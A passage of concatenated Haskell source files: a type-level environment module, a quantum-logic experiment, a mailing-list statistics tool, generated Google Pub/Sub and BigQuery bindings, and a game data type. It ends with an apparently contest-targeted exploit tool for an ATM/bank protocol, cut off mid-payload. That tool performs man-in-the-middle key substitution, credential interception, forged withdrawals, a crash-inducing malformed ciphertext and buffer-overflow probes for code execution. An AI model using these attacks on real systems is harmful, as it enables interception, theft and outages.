, EnvB (..)
, Extract (..)
) where
-- | A value of type a tagged (at the type level only) with an index ix.
newtype Env ix a = Env a
-- | Smart constructor: the index argument is used solely to fix ix.
mkEnv :: ix -> a -> Env ix a
mkEnv = const Env
-- | Right-nested heterogeneous product, HList-style.
data a :*: b = a :*: b
infixr 9 :*:
-- | Look up the component tagged with ix in an environment e; the
-- functional dependency makes the result type a unique per (ix, e).
class EnvX ix a e | ix e -> a where
  extract :: ix -> e -> a
-- Base case: the head of the product carries the requested index.
instance EnvX ix a ((Env ix a) :*: b) where
  extract _ ((Env a) :*: _) = a
-- Step case: otherwise keep searching in the tail.
instance EnvX ix a e => EnvX ix a (b :*: e) where
  extract ix (_ :*: e) = extract ix e
-- | Build a result product r from a specification k and a source
-- environment e; k determines the shape of r via the fundep.
class EnvB ix a e r k | k -> ix a r where
  build :: e -> k -> r
-- A ready-made Env is copied through (unit-terminated singleton).
instance EnvB ix a e (Env ix a :*: ()) (Env ix a) where
  build _ k = k :*: ()
-- Products are built pointwise: each specification component produces
-- one result component.
instance (EnvB ix a e (r :*: ()) k, EnvB ix2 a2 e r2 k2) => EnvB ix a e (r :*: r2) (k :*: k2) where
  build e (a :*: b) =
    let k :*: _ = build e a
    in k :*: (build e b)
-- | Specification marker: pull the ix-tagged component out of the
-- source environment instead of supplying a value.
data Extract ix a = Extract
instance EnvX ix a e => EnvB ix a e (Env ix a :*: ()) (Extract ix a) where
  build e d = (Env $ extract (ix d) e) :*: ()
    -- Phantom helper: never evaluated, only fixes the index type.
    where ix :: Extract ix a -> ix
          ix = const undefined
| upwawet/vision | src/Data/Env.hs | gpl-3.0 | 1,878 | 0 | 11 | 521 | 584 | 322 | 262 | -1 | -1 |
import Data.QLogic.BoxWorld
import Data.QLogic
import qualified Data.IntSet as IntSet
import Data.IntSet ((\\))
-- Two binary observables per side of the two-box world.
x = Observable 'X' [0, 1]
y = Observable 'Y' [0, 1]
left = [x, y]
right = [x, y]
-- Alternative three-outcome setup kept for experimentation:
-- x = Observable 'X' [0, 1, 2]
-- y = Observable 'Y' [0, 1, 2]
-- z = Observable 'Z' [0, 1, 2]
-- left = [x, y, z]
-- right = [x, y, z]
-- | Exploratory driver: builds the two-box-world logic and prints a
-- series of checks on two sample elements (orthogonality,
-- complementation, compatibility, and the set representation).
main :: IO ()
main = do
        let ql = boxWorldLogic $ Two (left, right)
            q2set = toRepr ql
            set2q = fromRepr ql
            logic = logicRepr ql
            -- Two arbitrary sample elements of the logic.
            a = elementsOf ql !! 10
            b = elementsOf ql !! 56
            -- seta/seto are only used by the commented-out experiments.
            seta = q2set a
            seto = oneOf logic
        putStrLn $ show . length $ elementsOf ql
        -- print $ set2q a
        -- print $ set2q b
        -- Round-tripping through the set representation should be id.
        print a
        print $ set2q . q2set $ a
        print b
        print $ set2q . q2set $ b
        print $ orthoIn ql a b
        print "===================================="
        print $ q2set a
        print $ oneOf logic
        print "----"
        print $ IntSet.difference (oneOf logic) (q2set a)
        print $ IntSet.difference (q2set a) (oneOf logic)
        -- print $ (oneOf logic) \\ (q2set a)
        -- print $ seto \\ seta
        -- print $ seta \\ seto
        print "----"
        print $ ocmplIn logic $ q2set a
        print "===================================="
        print $ ocmplIn ql a
        -- An element should be orthogonal to its orthocomplement.
        print $ orthoIn ql a $ ocmplIn ql a
        print $ compatIn ql a b
        let aa = read "[X1Y0]+[X0X1]+[X0X0]" :: Question (Two Atomic)
            bb = read "[X1Y0]+[X0Y1]+[X0Y0]" :: Question (Two Atomic)
        print $ equalIn ql aa bb
| ttylec/QLogic | research/concrete.hs | gpl-3.0 | 1,479 | 1 | 12 | 432 | 492 | 240 | 252 | 39 | 1 |
-- This file is part of nmstats - mailing list statistics extractor
-- Copyright (C) 2015 Red Hat, Inc.
--
-- hs-notmuch is free software: you can redistribute it and/or modify
-- it under the terms of the GNU General Public License as published by
-- the Free Software Foundation, either version 3 of the License, or
-- (at your option) any later version.
--
-- This program is distributed in the hope that it will be useful,
-- but WITHOUT ANY WARRANTY; without even the implied warranty of
-- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- GNU General Public License for more details.
--
-- You should have received a copy of the GNU General Public License
-- along with this program. If not, see <http://www.gnu.org/licenses/>.
import Control.Monad ((>=>))
import Data.Foldable (traverse_)
import Data.Semigroup ((<>))
import System.Environment (getArgs)
import Text.Printf (printf)
import Data.Time (Day, addDays, getZonedTime, utctDay, zonedTimeToUTC)
import Notmuch
import Notmuch.Search
-- | Entry point.  Expects exactly four arguments: the notmuch database
-- path, the mailing-list address, the origin domain, and a day count.
-- Prints one 'printTable' line per day, oldest day first.  A wrong number
-- of arguments or a non-numeric day count prints a usage line instead of
-- crashing with an opaque pattern-match / 'read' failure.
main :: IO ()
main = do
  args <- getArgs
  case args of
    [dbPath, listAddr, fromDomain, daysArg]
      -- accept only a fully-consumed numeric day count
      | [(count, "")] <- reads daysArg ->
          run dbPath listAddr fromDomain (abs count)
    _ -> putStrLn "Usage: nmstats DB_PATH LIST_ADDRESS FROM_DOMAIN DAYS"
  where
    run dbPath listAddr fromDomain n = do
      db' <- databaseOpen dbPath
      today <- fmap (utctDay . zonedTimeToUTC) getZonedTime
      -- n days ago .. today, in chronological order
      let dates = zipWith (addDays . (0-)) [n,n-1..0] (repeat today)
      case db' of
        Left status -> putStrLn $ "Error: " <> show status
        Right db ->
          traverse_ (infoForDate db listAddr fromDomain >=> printTable) dates
-- | Collect one day's statistics: total messages to the list, messages
-- whose sender is outside the origin domain, and active threads.
infoForDate
  :: Database
  -> String -- ^ list address
  -> String -- ^ origin domain
  -> Day
  -> IO (Day, Int, Int, Int)
infoForDate db listAddr fromDomain day = do
  everything <- query db base
  offDomain <- query db (base `And` Not (From ("*@" <> fromDomain)))
  total <- queryCountMessages everything
  external <- queryCountMessages offDomain
  threads <- queryCountThreads everything
  return (day, total, external, threads)
  where
    -- restrict to the given day and to mail addressed to the list
    base = Date (show day) (show day) `And` To listAddr
-- | Multi-line, human-readable report for one day's statistics.
printVerbose :: String -> (Day, Int, Int, Int) -> IO ()
printVerbose fromDomain (day, total, external, threads) =
  traverse_ putStrLn
    [ show day
    , "  " <> show total <> " messages"
    , "  " <> show external <> " messages not from " <> fromDomain
    , "  " <> show threads <> " active threads"
    ]
-- | One-line, space-separated report: "&lt;day&gt; &lt;msgs&gt; &lt;external&gt; &lt;threads&gt;".
printTable :: (Day, Int, Int, Int) -> IO ()
printTable (day, total, external, threads) =
  putStrLn (unwords [show day, show total, show external, show threads])
| frasertweedale/hs-mlstats | src/Main.hs | gpl-3.0 | 2,501 | 0 | 13 | 480 | 653 | 349 | 304 | 45 | 2 |
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE NoImplicitPrelude #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TypeFamilies #-}
{-# LANGUAGE TypeOperators #-}
{-# OPTIONS_GHC -fno-warn-duplicate-exports #-}
{-# OPTIONS_GHC -fno-warn-unused-binds #-}
{-# OPTIONS_GHC -fno-warn-unused-imports #-}
-- |
-- Module : Network.Google.Resource.PubSub.Projects.Snapshots.Get
-- Copyright : (c) 2015-2016 Brendan Hay
-- License : Mozilla Public License, v. 2.0.
-- Maintainer : Brendan Hay <brendan.g.hay@gmail.com>
-- Stability : auto-generated
-- Portability : non-portable (GHC extensions)
--
-- Gets the configuration details of a snapshot. Snapshots are used in Seek
-- operations, which allow you to manage message acknowledgments in bulk.
-- That is, you can set the acknowledgment state of messages in an existing
-- subscription to the state captured by a snapshot.
--
-- /See:/ <https://cloud.google.com/pubsub/docs Cloud Pub/Sub API Reference> for @pubsub.projects.snapshots.get@.
module Network.Google.Resource.PubSub.Projects.Snapshots.Get
(
-- * REST Resource
ProjectsSnapshotsGetResource
-- * Creating a Request
, projectsSnapshotsGet
, ProjectsSnapshotsGet
-- * Request Lenses
, psgsXgafv
, psgsSnapshot
, psgsUploadProtocol
, psgsAccessToken
, psgsUploadType
, psgsCallback
) where
import Network.Google.Prelude
import Network.Google.PubSub.Types
-- | A resource alias for @pubsub.projects.snapshots.get@ method which the
-- 'ProjectsSnapshotsGet' request conforms to.
type ProjectsSnapshotsGetResource =
     -- GET /v1/{snapshot} with the standard Google API query parameters,
     -- returning a JSON-decoded 'Snapshot'.
     "v1" :>
       Capture "snapshot" Text :>
         QueryParam "$.xgafv" Xgafv :>
           QueryParam "upload_protocol" Text :>
             QueryParam "access_token" Text :>
               QueryParam "uploadType" Text :>
                 QueryParam "callback" Text :>
                   QueryParam "alt" AltJSON :> Get '[JSON] Snapshot
-- | Gets the configuration details of a snapshot. Snapshots are used in Seek
-- operations, which allow you to manage message acknowledgments in bulk.
-- That is, you can set the acknowledgment state of messages in an existing
-- subscription to the state captured by a snapshot.
--
-- /See:/ 'projectsSnapshotsGet' smart constructor.
data ProjectsSnapshotsGet =
  ProjectsSnapshotsGet'
    { _psgsXgafv :: !(Maybe Xgafv) -- ^ V1 error format selector
    , _psgsSnapshot :: !Text -- ^ required: full snapshot resource name
    , _psgsUploadProtocol :: !(Maybe Text) -- ^ upload protocol, e.g. raw, multipart
    , _psgsAccessToken :: !(Maybe Text) -- ^ OAuth access token
    , _psgsUploadType :: !(Maybe Text) -- ^ legacy upload protocol selector
    , _psgsCallback :: !(Maybe Text) -- ^ JSONP callback name
    }
  deriving (Eq, Show, Data, Typeable, Generic)
-- | Creates a value of 'ProjectsSnapshotsGet' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'psgsXgafv'
--
-- * 'psgsSnapshot'
--
-- * 'psgsUploadProtocol'
--
-- * 'psgsAccessToken'
--
-- * 'psgsUploadType'
--
-- * 'psgsCallback'
projectsSnapshotsGet
    :: Text -- ^ 'psgsSnapshot'
    -> ProjectsSnapshotsGet
projectsSnapshotsGet snapshotName =
  -- positional construction: xgafv, snapshot, uploadProtocol, accessToken,
  -- uploadType, callback -- every optional query parameter starts unset
  ProjectsSnapshotsGet' Nothing snapshotName Nothing Nothing Nothing Nothing
-- Lenses over the request's fields (getter/setter pairs over the record).
-- | V1 error format.
psgsXgafv :: Lens' ProjectsSnapshotsGet (Maybe Xgafv)
psgsXgafv
  = lens _psgsXgafv (\ s a -> s{_psgsXgafv = a})
-- | Required. The name of the snapshot to get. Format is
-- \`projects\/{project}\/snapshots\/{snap}\`.
psgsSnapshot :: Lens' ProjectsSnapshotsGet Text
psgsSnapshot
  = lens _psgsSnapshot (\ s a -> s{_psgsSnapshot = a})
-- | Upload protocol for media (e.g. \"raw\", \"multipart\").
psgsUploadProtocol :: Lens' ProjectsSnapshotsGet (Maybe Text)
psgsUploadProtocol
  = lens _psgsUploadProtocol
      (\ s a -> s{_psgsUploadProtocol = a})
-- | OAuth access token.
psgsAccessToken :: Lens' ProjectsSnapshotsGet (Maybe Text)
psgsAccessToken
  = lens _psgsAccessToken
      (\ s a -> s{_psgsAccessToken = a})
-- | Legacy upload protocol for media (e.g. \"media\", \"multipart\").
psgsUploadType :: Lens' ProjectsSnapshotsGet (Maybe Text)
psgsUploadType
  = lens _psgsUploadType
      (\ s a -> s{_psgsUploadType = a})
-- | JSONP callback name.
psgsCallback :: Lens' ProjectsSnapshotsGet (Maybe Text)
psgsCallback
  = lens _psgsCallback (\ s a -> s{_psgsCallback = a})
-- Wires the record to the servant-style route above: response type,
-- required OAuth scopes, and how the fields map onto the route's segments.
instance GoogleRequest ProjectsSnapshotsGet where
        type Rs ProjectsSnapshotsGet = Snapshot
        type Scopes ProjectsSnapshotsGet =
             '["https://www.googleapis.com/auth/cloud-platform",
               "https://www.googleapis.com/auth/pubsub"]
        requestClient ProjectsSnapshotsGet'{..}
          = go _psgsSnapshot _psgsXgafv _psgsUploadProtocol
              _psgsAccessToken
              _psgsUploadType
              _psgsCallback
              (Just AltJSON)
              pubSubService
          where go
                  = buildClient
                      (Proxy :: Proxy ProjectsSnapshotsGetResource)
                      mempty
| brendanhay/gogol | gogol-pubsub/gen/Network/Google/Resource/PubSub/Projects/Snapshots/Get.hs | mpl-2.0 | 5,191 | 0 | 15 | 1,130 | 705 | 415 | 290 | 103 | 1 |
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE NoImplicitPrelude #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TypeFamilies #-}
{-# LANGUAGE TypeOperators #-}
{-# OPTIONS_GHC -fno-warn-duplicate-exports #-}
{-# OPTIONS_GHC -fno-warn-unused-binds #-}
{-# OPTIONS_GHC -fno-warn-unused-imports #-}
-- |
-- Module : Network.Google.Resource.BigQuery.Jobs.Insert
-- Copyright : (c) 2015-2016 Brendan Hay
-- License : Mozilla Public License, v. 2.0.
-- Maintainer : Brendan Hay <brendan.g.hay@gmail.com>
-- Stability : auto-generated
-- Portability : non-portable (GHC extensions)
--
-- Starts a new asynchronous job. Requires the Can View project role.
--
-- /See:/ <https://cloud.google.com/bigquery/ BigQuery API Reference> for @bigquery.jobs.insert@.
module Network.Google.Resource.BigQuery.Jobs.Insert
(
-- * REST Resource
JobsInsertResource
-- * Creating a Request
, jobsInsert
, JobsInsert
-- * Request Lenses
, jiPayload
, jiProjectId
) where
import Network.Google.BigQuery.Types
import Network.Google.Prelude
-- | A resource alias for @bigquery.jobs.insert@ method which the
-- 'JobsInsert' request conforms to.
type JobsInsertResource =
     -- Two alternatives: a plain JSON metadata insert, and the media-upload
     -- variant under the /upload prefix (selected by 'MediaUpload' below).
     "bigquery" :>
       "v2" :>
         "projects" :>
           Capture "projectId" Text :>
             "jobs" :>
               QueryParam "alt" AltJSON :>
                 ReqBody '[JSON] Job :> Post '[JSON] Job
       :<|>
       "upload" :>
         "bigquery" :>
           "v2" :>
             "projects" :>
               Capture "projectId" Text :>
                 "jobs" :>
                   QueryParam "alt" AltJSON :>
                     QueryParam "uploadType" Multipart :>
                       MultipartRelated '[JSON] Job :> Post '[JSON] Job
-- | Starts a new asynchronous job. Requires the Can View project role.
--
-- /See:/ 'jobsInsert' smart constructor.
data JobsInsert =
  JobsInsert'
    { _jiPayload :: !Job -- ^ job configuration / multipart request metadata
    , _jiProjectId :: !Text -- ^ project billed for the job
    }
  deriving (Eq, Show, Data, Typeable, Generic)
-- | Creates a value of 'JobsInsert' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'jiPayload'
--
-- * 'jiProjectId'
jobsInsert
    :: Job -- ^ 'jiPayload'
    -> Text -- ^ 'jiProjectId'
    -> JobsInsert
jobsInsert payload projectId =
  JobsInsert'
    { _jiPayload = payload
    , _jiProjectId = projectId
    }
-- | Multipart request metadata: the job configuration being inserted.
jiPayload :: Lens' JobsInsert Job
jiPayload
  = lens _jiPayload (\ s a -> s{_jiPayload = a})
-- | Project ID of the project that will be billed for the job.
jiProjectId :: Lens' JobsInsert Text
jiProjectId
  = lens _jiProjectId (\ s a -> s{_jiProjectId = a})
-- Metadata-only insert: uses the left alternative of 'JobsInsertResource'
-- (note the pattern "go :<|> _" selecting the first route's client).
instance GoogleRequest JobsInsert where
        type Rs JobsInsert = Job
        type Scopes JobsInsert =
             '["https://www.googleapis.com/auth/bigquery",
               "https://www.googleapis.com/auth/cloud-platform",
               "https://www.googleapis.com/auth/devstorage.full_control",
               "https://www.googleapis.com/auth/devstorage.read_only",
               "https://www.googleapis.com/auth/devstorage.read_write"]
        requestClient JobsInsert'{..}
          = go _jiProjectId (Just AltJSON) _jiPayload
              bigQueryService
          where go :<|> _
                  = buildClient (Proxy :: Proxy JobsInsertResource)
                      mempty
-- Media upload: same scopes, but drives the right alternative (the /upload
-- route) and attaches the uploaded body ("_ :<|> go").
instance GoogleRequest (MediaUpload JobsInsert) where
        type Rs (MediaUpload JobsInsert) = Job
        type Scopes (MediaUpload JobsInsert) =
             Scopes JobsInsert
        requestClient (MediaUpload JobsInsert'{..} body)
          = go _jiProjectId (Just AltJSON) (Just Multipart)
              _jiPayload
              body
              bigQueryService
          where _ :<|> go
                  = buildClient (Proxy :: Proxy JobsInsertResource)
                      mempty
| brendanhay/gogol | gogol-bigquery/gen/Network/Google/Resource/BigQuery/Jobs/Insert.hs | mpl-2.0 | 4,082 | 0 | 24 | 1,113 | 598 | 338 | 260 | 86 | 1 |
{-
Habit of Fate, a game to incentivize habit formation.
Copyright (C) 2019 Gregory Crosswhite
This program is free software: you can redistribute it and/or modify
it under version 3 of the terms of the GNU Affero General Public License.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
-}
{-# LANGUAGE AutoDeriveTypeable #-}
{-# LANGUAGE NoImplicitPrelude #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE TemplateHaskell #-}
{-# LANGUAGE UnicodeSyntax #-}
module HabitOfFate.Data.Deed where
import HabitOfFate.Prelude
import Data.Aeson (FromJSON(..), ToJSON(..), (.:), object, withObject)
import Data.Time.LocalTime
import HabitOfFate.Data.Markdown
import HabitOfFate.Data.SuccessOrFailureResult
import HabitOfFate.JSON
-- | A recorded deed: the outcome (success or failure), the story text shown
-- to the user, and the local time at which it happened.
data Deed = Deed SuccessOrFailureResult Markdown LocalTime deriving (Eq,Ord,Read,Show)
-- Serializes to {"result": .., "story": .., "when": ..}; the keys round-trip
-- with the FromJSON instance below.  (.==) is the project's pairing helper.
instance ToJSON Deed where
  toJSON (Deed result text when) = object
    [ "result" .== result
    , "story" .== toJSON text
    , "when" .== when
    ]
instance FromJSON Deed where
  parseJSON = withObject "deed must be object-shaped" $ \o →
    Deed
      <$> (o .: "result")
      <*> (o .: "story")
      <*> (o .: "when")
| gcross/habit-of-fate | sources/library/HabitOfFate/Data/Deed.hs | agpl-3.0 | 1,527 | 0 | 12 | 297 | 216 | 126 | 90 | 24 | 0 |
-- Hackage dependencies: asn1-encoding cryptonite network
{-# LANGUAGE NoMonomorphismRestriction, OverloadedStrings #-}
import Control.Applicative
import Control.Concurrent
import Control.Monad
import Crypto.Cipher.AES
import Crypto.Cipher.Types
import Crypto.Error
import Crypto.Hash.Algorithms
import Crypto.PubKey.RSA
import Crypto.PubKey.RSA.OAEP
import Crypto.Random
import Data.ASN1.BinaryEncoding
import Data.ASN1.BitArray
import Data.ASN1.Encoding
import Data.ASN1.Types
import Data.Char
import Data.IORef
import Data.Maybe
import Data.Word
import Network
import Network.Socket.ByteString
import System.Environment
import System.Exit
import System.Timeout
import System.IO
import qualified Data.ByteString as B
import qualified Data.ByteString.Char8
import qualified Data.ByteString.Lazy as L
-- Small conversion helpers shared by the exploits below.
-- Safe counterpart to 'read': Nothing when nothing parses.
readMaybe s = fmap fst (listToMaybe (reads s))
-- Collapse a lazy ByteString into a strict one.
lToStrict lbs = B.concat (L.toChunks lbs)
-- Latin-1-style String/ByteString conversions (each Char truncated to 8 bits).
stringToBS str = B.pack [fromIntegral (ord c) | c <- str]
bsToString bs = [chr (fromIntegral w) | w <- B.unpack bs]
showBS x = stringToBS (show x)
-- Wrap/unwrap numeric ports; unPort is partial for non-PortNumber PortIDs.
port n = PortNumber (fromIntegral n)
unPort (PortNumber p) = p
-- | Print usage information and abort with a nonzero exit code.
showHelp = do
    name <- getProgName
    mapM_ putStrLn
        [ "Usage: " ++ name ++ " EXPLOIT_NAME ATM_PORT BANK_PORT"
        , "EXPLOIT_NAME = LogTraffic | InterceptCreds | ArbitraryWithdrawal | ExceptionDOS | RCE"
        ]
    exitFailure
-- | Initialise networking (a no-op on POSIX) and dispatch on the arguments.
main = withSocketsDo (main' =<< getArgs)
-- | Parse both port arguments; calls 'error' with the original messages on
-- anything non-numeric.
validatePorts atmArg bankArg = (parse "atmPort" atmArg, parse "bankPort" bankArg)
  where
    parse label raw = maybe (error ("Failed to parse " ++ label)) port (readMaybe raw)
-- | Dispatch on the exploit name.  The three proxy-style exploits shared a
-- verbatim copy of the listen/accept/fork loop; that loop now lives in
-- 'serveMitm' and each clause only supplies its traffic handler.
main' :: [String] -> IO ()
main' ["LogTraffic", atmPort', bankPort'] =
    serveMitm atmPort' bankPort' $ \_bankPort -> passiveMitm (const (return ()))
main' ["InterceptCreds", atmPort', bankPort'] =
    serveMitm atmPort' bankPort' $ \bankPort -> passiveMitm (interceptCreds bankPort)
main' ["ArbitraryWithdrawal", atmPort', bankPort'] =
    serveMitm atmPort' bankPort' $ \_bankPort -> arbitraryWithdrawal
main' ["ExceptionDOS", atmPort', bankPort'] = do
    let (_, bankPort) = validatePorts atmPort' bankPort'
    bank <- connectTo "localhost" bankPort
    exceptionDOS bank
main' ["RCE", atmPort', bankPort'] = do
    let (_, bankPort) = validatePorts atmPort' bankPort'
    handshakeExploit bankPort
main' (unrecognized:_) = do
    putStrLn $ "Unrecognized exploit name: " ++ unrecognized
    showHelp
main' _ = showHelp

-- | Shared listener loop: validate the port arguments, listen on the ATM
-- port, and hand every accepted connection to 'doMitm' on its own thread.
-- 'mkHandler' receives the bank port so handlers that dial back (e.g.
-- 'interceptCreds') can reach the bank.
serveMitm atmPort' bankPort' mkHandler = do
    let (atmPort, bankPort) = validatePorts atmPort' bankPort'
    listener <- listenOn atmPort
    forever $ accept listener >>= forkIO . doMitm bankPort (mkHandler bankPort)
-- | Bidirectional byte pump between the ATM-facing handle and the bank
-- connection.  'logTo' / 'logFrom' see (and may rewrite) each chunk before
-- it is forwarded; that is the hook the active exploits splice into.
--
-- NOTE(review): the loop services the two directions in strict alternation,
-- and 'hIsEOF' blocks until data or EOF arrives, so a peer that goes quiet
-- can stall traffic in the other direction — presumably fine for this
-- strictly request/response protocol, but confirm.
dumbProxy atm bank logTo logFrom = loop where
    bufferSize = 4096
    loop = do
        atmEOF <- hIsEOF atm
        unless atmEOF $ do
            -- one chunk ATM -> bank, possibly rewritten by logTo
            B.hGetSome atm bufferSize >>= logTo >>= B.hPut bank
            bankEOF <- hIsEOF bank
            unless bankEOF $ do
                -- one chunk bank -> ATM, possibly rewritten by logFrom
                B.hGetSome bank bufferSize >>= logFrom >>= B.hPut atm
                loop
-- | Read exactly @B.length s@ bytes from the handle and 'error' unless they
-- equal @s@.  The original used a single 'B.hGetSome', which may return
-- fewer bytes than requested on a socket and so could report a spurious
-- mismatch even when the peer did send the expected bytes.
expect h s = do
    s' <- hGetExactly (B.length s)
    unless (s == s') $ error "expect: unexpected input"
  where
    -- Keep reading until we have the full count; EOF yields a short result,
    -- which the comparison above then reports as a mismatch.
    hGetExactly n
      | n <= 0 = return B.empty
      | otherwise = do
          chunk <- B.hGetSome h n
          if B.null chunk
            then return chunk
            else fmap (B.append chunk) (hGetExactly (n - B.length chunk))
-- | Parse a BER-encoded X.509 SubjectPublicKeyInfo into an RSA public key.
-- Only the rsaEncryption OID (1.2.840.113549.1.1.1) layout is accepted;
-- anything else yields Nothing.  The BIT STRING length is a size in bits,
-- hence the division by 8 to get 'public_size' in bytes.
decodeX509Pubkey :: L.ByteString -> Maybe PublicKey
decodeX509Pubkey x = case decodeASN1 BER x of
    Right [Start Sequence,
        Start Sequence, OID [1,2,840,113549,1,1,1], Null, End Sequence,
        BitString (BitArray size s), End Sequence] ->
            case decodeASN1 BER (L.fromChunks [s]) of
                Right [Start Sequence, IntVal n, IntVal e, End Sequence] ->
                    Just (PublicKey (fromIntegral size `div` 8) n e)
                _ -> Nothing
    _ -> Nothing
-- | DER-encode an RSA public key in the same X.509 layout.
-- NOTE(review): 'decodeX509Pubkey' treats the BitArray length as *bits*
-- (divides by 8) but this passes 'public_size' (*bytes*) straight through,
-- so the two are not inverses — presumably the peer's parser ignores the
-- length; confirm before "fixing" either side.
encodeX509Pubkey :: PublicKey -> B.ByteString
encodeX509Pubkey (PublicKey size n e) = lToStrict $ encodeASN1 DER [Start Sequence,
    Start Sequence, OID [1,2,840,113549,1,1,1], Null, End Sequence,
    BitString (BitArray (fromIntegral size) s), End Sequence] where
        s = lToStrict $ encodeASN1 DER [Start Sequence, IntVal n, IntVal e, End Sequence]
-- | Build an AES-128 cipher; calls 'error' on anything but a valid key.
makeAES :: B.ByteString -> AES128
makeAES key = either (error . show) id . eitherCryptoError $ cipherInit key
-- | Run the RSA/OAEP + AES-CFB handshake against both sides at once: the
-- ATM receives our freshly generated RSA key instead of the bank's, so every
-- secret the ATM encrypts (AES key, IV, initial nonce) is readable here and
-- is re-encrypted under the bank's real key before forwarding.  Returns the
-- session cipher and IV for use by the traffic handlers.
-- (logTo/logFrom are accepted for symmetry with the handlers but unused.)
mitmHandshake atm bank logTo logFrom = do
    let bufferSize = 4096
    let pubSizeBits = 3072
    -- plaintext hello in both directions
    expect atm "DUMMY"
    B.hPut bank "DUMMY"
    -- bank sends its X.509 public key; we answer the ATM with our own
    bankPubRaw <- B.hGetSome bank bufferSize
    (mitmPub, mitmPriv) <- generate (pubSizeBits `div` 8) 0x10001
    let mitmDecrypt = (either (error . show) id) . decrypt Nothing (defaultOAEPParams SHA1) mitmPriv
    let bankPub = maybe (error "Failed to decode bank pubkey") id $ decodeX509Pubkey (L.fromChunks [bankPubRaw])
    --print bankPub
    --print mitmPub
    let bankPub' = bankPub { public_size = pubSizeBits `div` 8 } -- fiddle with things to get them to work
    let pubEncrypt = fmap (either (error . show) id) . encrypt (defaultOAEPParams SHA1) bankPub'
    --print bankPub'
    B.hPut atm (encodeX509Pubkey mitmPub)
    -- session AES key: decrypt with our key, re-encrypt with the bank's
    encAES <- B.hGetSome atm bufferSize
    let rawAES = mitmDecrypt encAES
    putStr "Raw AES key: " >> print rawAES
    let aes = makeAES rawAES
    mitmAES <- pubEncrypt rawAES
    B.hPutStr bank mitmAES -- memory corruption exploit possible here, see handshakeExploit
    expect bank "DUMMY"
    B.hPut atm "DUMMY"
    -- same relay dance for the CFB initialisation vector
    encIV <- B.hGetSome atm bufferSize
    let rawIV = mitmDecrypt encIV
    putStr "Raw AES IV: " >> print rawIV
    mitmIV <- pubEncrypt rawIV
    B.hPutStr bank mitmIV
    expect bank "DUMMY"
    B.hPut atm "DUMMY"
    -- initial anti-replay nonce travels under the (now shared) AES session
    encNonce <- B.hGetSome atm bufferSize
    let Just aesIV = makeIV rawIV
    let rawNonce = cfbDecrypt aes aesIV encNonce
    putStr "Raw Initial Nonce: "
    print rawNonce
    let mitmNonce = cfbEncrypt aes aesIV rawNonce
    B.hPutStr bank mitmNonce
    expect bank "DUMMY"
    B.hPut atm "DUMMY"
    return (aes, aesIV)
{-
Crash produced in the bank by exceptionDOS:
terminate called after throwing an instance of 'CryptoPP::InvalidArgument'
  what():  RSA/OAEP-MGF1(SHA-1): ciphertext length of 5 doesn't match the required length of 384 for this key
Aborted
-}
-- | Denial of service: answer the bank's public key with a 5-byte blob where
-- a 384-byte RSA ciphertext is expected; the bank's unguarded OAEP decrypt
-- throws and aborts the whole process (transcript above).
exceptionDOS bank = do
    let bufferSize = 4096
    B.hPut bank "DUMMY"
    bankPubRaw <- B.hGetSome bank bufferSize
    B.hPutStr bank "Hello"
-- | Remote code execution probe: complete the key exchange legitimately but
-- supply crafted 342-byte "AES key" payloads (overflow patterns) that the
-- bank copies into a fixed-size buffer.  The payload strings are the exact
-- offsets under test and must not be altered.
handshakeExploit bankPort = do
    let bufferSize = 4096
    let pubSizeBits = 3072
    let sendPayload h payload k = do
          B.hPut h "DUMMY"
          bankPubRaw <- B.hGetSome h bufferSize
          let Just bankPub = decodeX509Pubkey (L.fromChunks [bankPubRaw])
          let bankPub' = bankPub { public_size = pubSizeBits `div` 8 } -- fiddle with things to get them to work
          --print bankPub'
          putStr "Raw Payload: "
          print $ payload
          Right encPayload <- encrypt (defaultOAEPParams SHA1) bankPub' $ payload
          putStr "Encrypted Payload: "
          print $ encPayload
          B.hPutStr h encPayload
          k h bankPub'
    {-
    let continuation1 h bankPub' = do
          Right encIV <- encrypt (defaultOAEPParams SHA1) bankPub' $ B.replicate 20 0x43
          expect h "DUMMY"
          B.hPutStr h encIV
          B.hPutStr h "dummy"
          expect h "DUMMY"
          hClose h
          putStrLn "end"
    -}
    let continuation2 h _ = do
          hClose h
    --let payload = B.replicate 342 0x41
    let payload1 = "AAAABAAACAAADAAAEAAAFAAAGAAAHAAAIAAAJAAAKAAALAAAMAAANAAAOAAAPAAAQAAARAAASAAATAAAUAAAVAAAWAAAXAAAYAAAZAABBAABCAABDAABEAABFAABGAABHAABIAABJAABKAABLAABMAABNAABOAABPAABQAABRAABSAABTAABUAABVAABWAABXAABYAABZAACBAACCAACDAACEAACFAACGAACHAACIAACJAACKAACLAACMAACNAACOAACPAACQAACRAACSAACTAACUAACVAACWAACXAACYAACZAADBAADCAADDAADEAADFAADGAADHAADIAADJAADKA"
